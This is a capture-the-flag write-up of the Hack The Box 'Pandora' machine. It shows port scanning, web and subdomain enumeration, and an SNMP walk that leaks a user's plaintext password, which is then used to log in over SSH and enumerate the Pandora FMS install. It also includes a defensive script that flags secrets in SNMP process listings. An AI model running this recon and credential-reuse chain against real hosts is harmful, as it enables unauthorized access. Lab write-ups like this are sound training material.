Pandora-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: SNMP information disclosure, SSH port forwarding, exploitation of CVE-2020-5844, exploitation of CVE-2021-32099, exploitation of a tar environment-variable misconfiguration

Reference: https://0xdf.gitlab.io/2022/05/21/htb-pandora.html

Reference: https://siunam321.github.io/ctf/hackthebox/Pandora/

0x01 Getting user access

1. Get the target's IP address: 10.10.11.136

2. Check connectivity to the target:

┌──(kali㉿kali)-[~/桌面]
└─$ ping 10.10.11.136 -c 4
PING 10.10.11.136 (10.10.11.136) 56(84) bytes of data.
64 bytes from 10.10.11.136: icmp_seq=1 ttl=63 time=286 ms
64 bytes from 10.10.11.136: icmp_seq=2 ttl=63 time=275 ms
64 bytes from 10.10.11.136: icmp_seq=3 ttl=63 time=285 ms
64 bytes from 10.10.11.136: icmp_seq=4 ttl=63 time=383 ms

--- 10.10.11.136 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 275.412/307.245/383.245/44.061 ms

3. Scan the target for open ports:

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.11.136
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-27 09:09 CST
Nmap scan report for 10.10.11.136
Host is up (0.30s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 10.32 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,80 -Pn --min-rate=10000 10.10.11.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-27 09:09 CST
Nmap scan report for 10.10.11.136
Host is up (0.28s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.10 seconds

4. Take a look at the site's home page.

5. The home page references a domain name, so add a hosts entry for it:

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.11.136 panda.htb" | sudo tee -a /etc/hosts
10.10.11.136 panda.htb

6. Start directory enumeration:

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://panda.htb/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_panda.htb/__23-12-27_09-15-43.txt

Target: http://panda.htb/

[09:15:43] Starting:
[09:15:55] 403 - 274B - /.ht_wsr.txt
[09:15:55] 403 - 274B - /.htaccess.bak1
[09:15:56] 403 - 274B - /.htaccess.orig
[09:15:56] 403 - 274B - /.htaccess.sample
[09:15:56] 403 - 274B - /.htaccess.save
[09:15:56] 403 - 274B - /.htaccess_extra
[09:15:56] 403 - 274B - /.htaccess_orig
[09:15:56] 403 - 274B - /.htaccess_sc
[09:15:56] 403 - 274B - /.htaccessBAK
[09:15:56] 403 - 274B - /.htaccessOLD
[09:15:56] 403 - 274B - /.htaccessOLD2
[09:15:56] 403 - 274B - /.htm
[09:15:56] 403 - 274B - /.html
[09:15:56] 403 - 274B - /.htpasswd_test
[09:15:56] 403 - 274B - /.htpasswds
[09:15:56] 403 - 274B - /.httr-oauth
[09:16:00] 403 - 274B - /.php
[09:16:47] 200 - 476B - /assets/
[09:16:47] 301 - 307B - /assets -> http://panda.htb/assets/
[09:18:04] 403 - 274B - /server-status
[09:18:04] 403 - 274B - /server-status/

Task Completed

┌──(kali㉿kali)-[~/桌面]
└─$ gobuster dir -u http://panda.htb/ --wordlist=/usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://panda.htb/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 274]
/.hta (Status: 403) [Size: 274]
/.htpasswd (Status: 403) [Size: 274]
/assets (Status: 301) [Size: 307] [--> http://panda.htb/assets/]
/index.html (Status: 200) [Size: 33560]
/server-status (Status: 403) [Size: 274]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

7. Nothing useful turned up, so continue with subdomain enumeration:

┌──(kali㉿kali)-[~/桌面]
└─$ gobuster dns -d panda.htb -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain: panda.htb
[+] Threads: 10
[+] Timeout: 1s
[+] Wordlist: /usr/share/dnsrecon/subdomains-top1mil-5000.txt
===============================================================
Starting gobuster in DNS enumeration mode
===============================================================
Progress: 5000 / 5001 (99.98%)
===============================================================
Finished
===============================================================

8. Nothing here either, and my various searches through the site found nothing useful. But I had skipped a UDP scan during port enumeration; running one now does reveal something:

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sU 10.10.11.136 -p- --min-rate=10000
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-27 09:46 CST
Warning: 10.10.11.136 giving up on port because retransmission cap hit (10).
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.29s latency).
Not shown: 65455 open|filtered udp ports (no-response), 79 closed udp ports (port-unreach)
PORT STATE SERVICE
161/udp open snmp

Nmap done: 1 IP address (1 host up) scanned in 74.51 seconds

9. The scan finds SNMP, from which a lot of information can be obtained.

SNMP (Simple Network Management Protocol) is a protocol for monitoring different devices in a network (routers, switches, printers, IoT devices, ...).

To make SNMP access work across manufacturers and across different client-server combinations, the Management Information Base (MIB) was created. A MIB is an independent format for storing device information: a text file in which all of a device's queryable SNMP objects are listed in a standardized tree hierarchy. It contains at least one **Object Identifier** (**OID**) which, in addition to the required unique address and a name, also carries information about the type, the access rights and a description of the respective object. MIB files are written in an ASCII text format based on Abstract Syntax Notation One (ASN.1). MIBs do not contain data themselves; they explain where which information can be found, what it looks like, which values a particular OID returns, and which data type is used.

OID stands for Object Identifier. An OID uniquely identifies a managed object in the MIB hierarchy. This can be depicted as a tree whose levels are assigned by different organizations. Top-level MIB object IDs (OIDs) belong to different standards organizations; vendors define private branches that include the managed objects of their own products.

https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp

10. Use snmpwalk to collect information:

┌──(kali㉿kali)-[~/桌面]
└─$ snmpwalk -c public -v1 10.10.11.136
iso.3.6.1.2.1.1.1.0 = STRING: "Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (637780) 1:46:17.80
iso.3.6.1.2.1.1.4.0 = STRING: "Daniel"
iso.3.6.1.2.1.1.5.0 = STRING: "pandora"
iso.3.6.1.2.1.1.6.0 = STRING: "Mississippi"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (3) 0:00:00.03
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.25.4.2.1.4.488 = STRING: "/lib/systemd/systemd-journald"
iso.3.6.1.2.1.25.4.2.1.4.515 = STRING: "/lib/systemd/systemd-udevd"
iso.3.6.1.2.1.25.4.2.1.4.527 = STRING: "/lib/systemd/systemd-networkd"
iso.3.6.1.2.1.25.4.2.1.4.568 = ""
iso.3.6.1.2.1.25.4.2.1.4.658 = ""
iso.3.6.1.2.1.25.4.2.1.4.659 = ""
iso.3.6.1.2.1.25.4.2.1.4.660 = ""
iso.3.6.1.2.1.25.4.2.1.4.661 = ""
iso.3.6.1.2.1.25.4.2.1.4.662 = STRING: "/sbin/multipathd"
iso.3.6.1.2.1.25.4.2.1.4.670 = ""
iso.3.6.1.2.1.25.4.2.1.4.671 = ""
iso.3.6.1.2.1.25.4.2.1.4.682 = STRING: "/lib/systemd/systemd-resolved"
iso.3.6.1.2.1.25.4.2.1.4.684 = STRING: "/lib/systemd/systemd-timesyncd"
iso.3.6.1.2.1.25.4.2.1.4.702 = STRING: "/usr/bin/VGAuthService"
iso.3.6.1.2.1.25.4.2.1.4.711 = STRING: "/usr/bin/vmtoolsd"
iso.3.6.1.2.1.25.4.2.1.4.756 = STRING: "/usr/lib/accountsservice/accounts-daemon"
iso.3.6.1.2.1.25.4.2.1.4.758 = STRING: "/usr/bin/dbus-daemon"
iso.3.6.1.2.1.25.4.2.1.4.779 = STRING: "/usr/sbin/irqbalance"
iso.3.6.1.2.1.25.4.2.1.4.780 = STRING: "/usr/bin/python3"
iso.3.6.1.2.1.25.4.2.1.4.781 = STRING: "/usr/sbin/rsyslogd"
iso.3.6.1.2.1.25.4.2.1.4.789 = STRING: "/lib/systemd/systemd-logind"
iso.3.6.1.2.1.25.4.2.1.4.790 = STRING: "/usr/lib/udisks2/udisksd"
iso.3.6.1.2.1.25.4.2.1.4.828 = STRING: "/usr/sbin/cron"
iso.3.6.1.2.1.25.4.2.1.4.832 = STRING: "/usr/sbin/CRON"
iso.3.6.1.2.1.25.4.2.1.4.847 = STRING: "/bin/sh"
iso.3.6.1.2.1.25.4.2.1.4.856 = STRING: "/usr/sbin/atd"
iso.3.6.1.2.1.25.4.2.1.4.860 = STRING: "/usr/sbin/snmpd"
iso.3.6.1.2.1.25.4.2.1.4.864 = STRING: "sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups"
iso.3.6.1.2.1.25.4.2.1.4.937 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.940 = STRING: "/usr/lib/policykit-1/polkitd"
iso.3.6.1.2.1.25.4.2.1.4.951 = STRING: "/sbin/agetty"
iso.3.6.1.2.1.25.4.2.1.4.982 = STRING: "/usr/sbin/mysqld"
iso.3.6.1.2.1.25.4.2.1.4.1112 = STRING: "/usr/bin/host_check"
iso.3.6.1.2.1.25.4.2.1.4.1389 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.2055 = STRING: "/usr/libexec/fwupd/fwupd"
iso.3.6.1.2.1.25.4.2.1.4.2063 = STRING: "/usr/lib/upower/upowerd"
iso.3.6.1.2.1.25.4.2.1.4.2188 = ""
iso.3.6.1.2.1.25.4.2.1.4.2270 = ""
iso.3.6.1.2.1.25.4.2.1.4.2311 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.2353 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.2365 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.2373 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.2384 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.2458 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.2481 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.2519 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.4.2520 = STRING: "/usr/sbin/apache2"
iso.3.6.1.2.1.25.4.2.1.5.758 = STRING: "--system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only"
iso.3.6.1.2.1.25.4.2.1.5.779 = STRING: "--foreground"
iso.3.6.1.2.1.25.4.2.1.5.780 = STRING: "/usr/bin/networkd-dispatcher --run-startup-triggers"
iso.3.6.1.2.1.25.4.2.1.5.781 = STRING: "-n -iNONE"
iso.3.6.1.2.1.25.4.2.1.5.789 = ""
iso.3.6.1.2.1.25.4.2.1.5.790 = ""
iso.3.6.1.2.1.25.4.2.1.5.828 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.832 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.847 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
iso.3.6.1.2.1.25.4.2.1.5.856 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.860 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.864 = ""
iso.3.6.1.2.1.25.4.2.1.5.937 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.940 = STRING: "--no-debug"
iso.3.6.1.2.1.25.4.2.1.5.951 = STRING: "-o -p -- \\u --noclear tty1 linux"
iso.3.6.1.2.1.25.4.2.1.5.982 = ""
iso.3.6.1.2.1.25.4.2.1.5.1112 = STRING: "-u daniel -p HotelBabylon23"
iso.3.6.1.2.1.25.4.2.1.5.1389 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.2055 = ""
iso.3.6.1.2.1.25.4.2.1.5.2063 = ""
iso.3.6.1.2.1.25.4.2.1.5.2188 = ""
iso.3.6.1.2.1.25.4.2.1.5.2270 = ""
iso.3.6.1.2.1.25.4.2.1.5.2311 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.2353 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.2365 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.2373 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.2384 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.2458 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.2481 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.2519 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.2520 = STRING: "-k start"

11. From this output we obtain a username and password:

STRING: "-u daniel -p HotelBabylon23"
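The leak above is a process command line exposed through the hrSWRunParameters table of HOST-RESOURCES-MIB, which a read-only community is enough to walk. As an added example (not from the original writeup and not one of the tools it uses), the following Python script audits snmpwalk output for exactly this: it parses the hrSWRunPath and hrSWRunParameters rows and flags argument shapes such as `-p <value>` or `password=<value>`. The sample input is constructed here in snmpwalk's output format with a placeholder secret; the `-p /run/snmpd.pid` entry is included to show that path-valued arguments are skipped as likely pid/config files (a heuristic, not a guarantee).

```python
import re
from dataclasses import dataclass

# Numeric OID prefixes as snmpwalk prints them (HOST-RESOURCES-MIB, hrSWRunTable)
HR_SW_RUN_PATH = "iso.3.6.1.2.1.25.4.2.1.4."    # hrSWRunPath: executable of each process
HR_SW_RUN_PARAMS = "iso.3.6.1.2.1.25.4.2.1.5."  # hrSWRunParameters: its command-line arguments

# One snmpwalk line: OID = STRING: "..."  or  OID = ""  (other value types are ignored)
LINE = re.compile(r'^(?P<oid>\S+) = (?:STRING: "(?P<val>.*)"|"")$')

# Argument shapes that commonly carry a secret on a command line (a heuristic list)
SECRET_ARG = re.compile(
    r'(?:^|\s)(?:-p|--password|--pass|--token)[\s=]+(\S+)'
    r'|(?:password|passwd|pwd|token)=(\S+)',
    re.IGNORECASE,
)


@dataclass
class Finding:
    pid: int
    path: str
    params: str
    secret: str


def parse_walk(text):
    """Map pid -> (executable path, arguments) from raw snmpwalk output."""
    paths, params = {}, {}
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # Timeticks, OID, INTEGER rows and unrelated output
        oid, val = m.group("oid"), m.group("val") or ""
        if oid.startswith(HR_SW_RUN_PATH):
            paths[int(oid[len(HR_SW_RUN_PATH):])] = val
        elif oid.startswith(HR_SW_RUN_PARAMS):
            params[int(oid[len(HR_SW_RUN_PARAMS):])] = val
    return {pid: (paths.get(pid, ""), params.get(pid, ""))
            for pid in set(paths) | set(params)}


def find_leaked_secrets(text):
    """Return one Finding per process whose arguments look like they carry a secret."""
    findings = []
    for pid, (path, args) in sorted(parse_walk(text).items()):
        for m in SECRET_ARG.finditer(args):
            value = (m.group(1) or m.group(2)).strip("'\"")
            # Heuristic: a value that is a filesystem path is most likely a pid or
            # config file (e.g. snmpd's own "-p /run/snmpd.pid"), not a credential.
            if value.startswith("/"):
                continue
            findings.append(Finding(pid, path, args, value))
    return findings


# Constructed sample in snmpwalk's output format; EXAMPLE_SECRET is a placeholder, not a real value.
SAMPLE_WALK = """\
iso.3.6.1.2.1.1.5.0 = STRING: "pandora"
iso.3.6.1.2.1.1.3.0 = Timeticks: (637780) 1:46:17.80
iso.3.6.1.2.1.25.4.2.1.4.847 = STRING: "/bin/sh"
iso.3.6.1.2.1.25.4.2.1.4.860 = STRING: "/usr/sbin/snmpd"
iso.3.6.1.2.1.25.4.2.1.4.1112 = STRING: "/usr/bin/host_check"
iso.3.6.1.2.1.25.4.2.1.4.2188 = ""
iso.3.6.1.2.1.25.4.2.1.5.847 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p EXAMPLE_SECRET'"
iso.3.6.1.2.1.25.4.2.1.5.860 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.1112 = STRING: "-u daniel -p EXAMPLE_SECRET"
iso.3.6.1.2.1.25.4.2.1.5.2188 = ""
"""

if __name__ == "__main__":
    for f in find_leaked_secrets(SAMPLE_WALK):
        print(f"pid {f.pid}: {f.path} exposes a secret in its arguments: {f.params}")
```

Running it over a real walk of your own hosts (`snmpwalk -c <community> -v2c <host> 1.3.6.1.2.1.25.4.2.1`) gives the list of processes to fix. The durable fixes are on both sides: pass credentials through a file or environment rather than argv (argv is also visible in `ps` to every local user), and restrict the SNMP community to a system-only view in snmpd.conf instead of the default `public` community so that the host-resources tables are not readable from the network at all.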

12. Log in to the system with the credentials we found:

┌──(kali㉿kali)-[~/桌面]
└─$ ssh daniel@10.10.11.136
The authenticity of host '10.10.11.136 (10.10.11.136)' can't be established.
ED25519 key fingerprint is SHA256:yDtxiXxKzUipXy+nLREcsfpv/fRomqveZjm6PXq9+BY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.136' (ED25519) to the list of known hosts.
daniel@10.10.11.136's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Wed 27 Dec 03:13:17 UTC 2023

System load: 0.0
Usage of /: 63.1% of 4.87GB
Memory usage: 9%
Swap usage: 0%
Processes: 236
Users logged in: 0
IPv4 address for eth0: 10.10.11.136
IPv6 address for eth0: dead:beef::250:56ff:feb9:af3

=> /boot is using 91.8% of 219MB

0 updates can be applied immediately.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

daniel@pandora:~$ id
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel)
daniel@pandora:~$ pwd
/home/daniel
daniel@pandora:~$ ls
daniel@pandora:~$ ls -la /home
total 16
drwxr-xr-x 4 root root 4096 Dec 7 2021 .
drwxr-xr-x 18 root root 4096 Dec 7 2021 ..
drwxr-xr-x 4 daniel daniel 4096 Dec 27 03:13 daniel
drwxr-xr-x 2 matt matt 4096 Dec 7 2021 matt
daniel@pandora:~$

13. But as you can see, the first flag is not under this user.

14. Below is my series of enumeration steps:

daniel@pandora:~$ ss -lt
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 4096 127.0.0.53%lo:domain 0.0.0.0:*
LISTEN 0 128 0.0.0.0:ssh 0.0.0.0:*
LISTEN 0 80 127.0.0.1:mysql 0.0.0.0:*
LISTEN 0 511 *:http *:*
LISTEN 0 128 [::]:ssh [::]:*
daniel@pandora:~$ ls -lah /var/www/
total 16K
drwxr-xr-x 4 root root 4.0K Dec 7 2021 .
drwxr-xr-x 14 root root 4.0K Dec 7 2021 ..
drwxr-xr-x 3 root root 4.0K Dec 7 2021 html
drwxr-xr-x 3 matt matt 4.0K Dec 7 2021 pandora
daniel@pandora:~$ ls -la /var/www/html
total 48
drwxr-xr-x 3 root root 4096 Dec 7 2021 .
drwxr-xr-x 4 root root 4096 Dec 7 2021 ..
drwxr-xr-x 7 root root 4096 Dec 7 2021 assets
-rw-r--r-- 1 root root 33560 Dec 3 2021 index.html
daniel@pandora:~$ ls -la /var/www/pandora
total 16
drwxr-xr-x 3 matt matt 4096 Dec 7 2021 .
drwxr-xr-x 4 root root 4096 Dec 7 2021 ..
-rw-r--r-- 1 matt matt 63 Jun 11 2021 index.html
drwxr-xr-x 16 matt matt 4096 Dec 7 2021 pandora_console
daniel@pandora:~$ ls -la /var/www/pandora/pandora_console/
total 1596
drwxr-xr-x 16 matt matt 4096 Dec 7 2021 .
drwxr-xr-x 3 matt matt 4096 Dec 7 2021 ..
-rw-r--r-- 1 matt matt 3746 Jan 3 2020 ajax.php
drwxr-xr-x 6 matt matt 4096 Dec 7 2021 attachment
-rw-r--r-- 1 matt matt 1175 Jun 17 2021 audit.log
-rw-r--r-- 1 matt matt 534 Jan 3 2020 AUTHORS
-rw-r--r-- 1 matt matt 585 Jan 3 2020 composer.json
-rw-r--r-- 1 matt matt 16003 Jan 3 2020 composer.lock
-rw-r--r-- 1 matt matt 14875 May 17 2019 COPYING
-rw-r--r-- 1 matt matt 506 Jan 3 2020 DB_Dockerfile
drwxr-xr-x 2 matt matt 4096 Dec 7 2021 DEBIAN
-rw-r--r-- 1 matt matt 3366 Jan 3 2020 docker_entrypoint.sh
-rw-r--r-- 1 matt matt 1263 Jan 3 2020 Dockerfile
drwxr-xr-x 11 matt matt 4096 Dec 7 2021 extensions
drwxr-xr-x 4 matt matt 4096 Dec 7 2021 extras
drwxr-xr-x 2 matt matt 4096 Dec 7 2021 fonts
drwxr-xr-x 5 matt matt 4096 Dec 7 2021 general
drwxr-xr-x 20 matt matt 4096 Dec 7 2021 godmode
drwxr-xr-x 21 matt matt 36864 Dec 7 2021 images
drwxr-xr-x 21 matt matt 4096 Dec 7 2021 include
-rw-r--r-- 1 matt matt 52704 Dec 2 2021 index.php
-rw-r--r-- 1 matt matt 42398 Jan 3 2020 install.done
drwxr-xr-x 5 matt matt 4096 Dec 7 2021 mobile
drwxr-xr-x 15 matt matt 4096 Dec 7 2021 operation
-rw-r--r-- 1 matt matt 1302 Dec 27 01:06 pandora_console.log
-rw-r--r-- 1 matt matt 234 May 17 2019 pandora_console_logrotate_centos
-rw-r--r-- 1 matt matt 171 May 17 2019 pandora_console_logrotate_suse
-rw-r--r-- 1 matt matt 222 May 17 2019 pandora_console_logrotate_ubuntu
-rw-r--r-- 1 matt matt 4883 May 17 2019 pandora_console_upgrade
-rw-r--r-- 1 matt matt 1168598 Jan 3 2020 pandoradb_data.sql
-rw-r--r-- 1 matt matt 160283 Jan 3 2020 pandoradb.sql
-rw-r--r-- 1 matt matt 476 Jan 3 2020 pandora_websocket_engine.service
drwxr-xr-x 3 matt matt 4096 Dec 7 2021 tests
drwxr-xr-x 2 matt matt 4096 Dec 7 2021 tools
drwxr-xr-x 11 matt matt 4096 Dec 7 2021 vendor
-rw-r--r-- 1 matt matt 4856 Jan 3 2020 ws.php
daniel@pandora:~$ cat /var/www/pandora/pandora_console/DB_Dockerfile
FROM mysql:5.5
MAINTAINER Pandora FMS Team <info@pandorafms.com>

WORKDIR /pandorafms/pandora_console

ADD pandoradb.sql /docker-entrypoint-initdb.d
ADD pandoradb_data.sql /docker-entrypoint-initdb.d
RUN chown mysql /docker-entrypoint-initdb.d

ENV MYSQL_DATABASE=pandora

RUN echo " \n\
sed -i \"1iUSE \$MYSQL_DATABASE\" /docker-entrypoint-initdb.d/pandoradb.sql \n\
sed -i \"1iUSE \$MYSQL_DATABASE\" /docker-entrypoint-initdb.d/pandoradb_data.sql \n\
" >> /docker-entrypoint-initdb.d/create_pandoradb.sh
daniel@pandora:~$ cat /var/www/pandora/pandora_console/Dockerfile
FROM centos:centos6
MAINTAINER Pandora FMS Team <info@pandorafms.com>

RUN { \
echo '[EPEL]'; \
echo 'name = CentOS Epel'; \
echo 'baseurl = http://dl.fedoraproject.org/pub/epel/6/x86_64'; \
echo 'enabled=1'; \
echo 'gpgcheck=0'; \
} > /etc/yum.repos.d/extra_repos.repo

RUN { \
echo '[artica_pandorafms]'; \
echo 'name=CentOS6 - PandoraFMS official repo'; \
echo 'baseurl=http://artica.es/centos6'; \
echo 'gpgcheck=0'; \
echo 'enabled=1'; \
} > /etc/yum.repos.d/pandorafms.repo

RUN yum -y update; yum clean all;
RUN yum install -y \
git \
httpd \
cronie \
ntp \
openldap \
nfdump \
wget \
curl \
openldap \
plymouth \
xterm \
php \
php-gd \
graphviz \
php-mysql \
php-pear-DB \
php-pear \
php-pdo \
php-mbstring \
php-ldap \
php-snmp \
php-ldap \
php-common \
php-zip \
nmap \
net-snmp-utils \
mod_ssl \
xprobe2

#Clone the repo
RUN git clone -b develop https://github.com/pandorafms/pandorafms.git /tmp/pandorafms

#Exposing ports for: HTTP, SNMP Traps, Tentacle protocol
EXPOSE 80 162/udp 443 41121

# Simple startup script to avoid some issues observed with container restart
ADD docker_entrypoint.sh /entrypoint.sh
RUN chmod -v +x /entrypoint.sh

CMD ["/entrypoint.sh"]

daniel@pandora:~$ cat /var/www/pandora/pandora_console/docker_entrypoint.sh
#!/bin/bash
set -e
if [ -n "$MYSQL_PORT_3306_TCP" ]; then
if [ -z "$PANDORA_DB_HOST" ]; then
PANDORA_DB_HOST='mysql'
else
echo >&2 'warning: both PANDORA_DB_HOST and MYSQL_PORT_3306_TCP found'
echo >&2 " Connecting to PANDORA_DB_HOST ($PANDORA_DB_HOST)"
echo >&2 ' instead of the linked mysql container'
fi
fi

if [ -z "$PANDORA_DB_HOST" ]; then
echo >&2 'error: missing PANDORA_DB_HOST and MYSQL_PORT_3306_TCP environment variables'
echo >&2 ' Did you forget to --link some_mysql_container:mysql or set an external db'
echo >&2 ' with -e PANDORA_DB_HOST=hostname:port?'
exit 1
fi

# if we're linked to MySQL and thus have credentials already, let's use them
: ${PANDORA_DB_USER:=${MYSQL_ENV_MYSQL_USER:-root}}
if [ "$PANDORA_DB_USER" = 'root' ]; then
: ${PANDORA_DB_PASSWORD:=$MYSQL_ENV_MYSQL_ROOT_PASSWORD}
fi
: ${PANDORA_DB_PASSWORD:=$MYSQL_ENV_MYSQL_PASSWORD}
if [ -z "$PANDORA_DB_NAME" ]; then
: ${PANDORA_DB_NAME:=${MYSQL_ENV_MYSQL_DATABASE:-pandora}}
fi

if [ -z "$PANDORA_DB_PASSWORD" ]; then
echo >&2 'error: missing required PANDORA_DB_PASSWORD environment variable'
echo >&2 ' Did you forget to -e PANDORA_DB_PASSWORD=... ?'
echo >&2
echo >&2 ' (Also of interest might be PANDORA_DB_USER and PANDORA_DB_NAME.)'
exit 1
fi

mv -f /tmp/pandorafms/pandora_console /var/www/html
cd /var/www/html/pandora_console/include
cat > config.php <<- 'EOF'
<?php
$config["dbtype"] = "mysql";
$config["homedir"]="/var/www/html/pandora_console"; // Config homedir
$config["homeurl"]="/pandora_console"; // Base URL
$config["homeurl_static"]="/pandora_console"; // Don't delete
error_reporting(E_ALL);
$ownDir = dirname(__FILE__) . DIRECTORY_SEPARATOR;
EOF

echo "\$config[\"dbname\"]=\"$PANDORA_DB_NAME\";" >> config.php
echo "\$config[\"dbuser\"]=\"$PANDORA_DB_USER\";" >> config.php
echo "\$config[\"dbpass\"]=\"$PANDORA_DB_PASSWORD\";" >> config.php
echo "\$config[\"dbhost\"]=\"$PANDORA_DB_HOST\";" >> config.php
echo "include (\$ownDir . \"config_process.php\");" >> config.php
echo "?>" >> config.php

echo "Granting apache permissions to the console directory"
chown -R apache:apache /var/www/html/pandora_console
chmod 600 /var/www/html/pandora_console/include/config.php

# Customize php.iniA
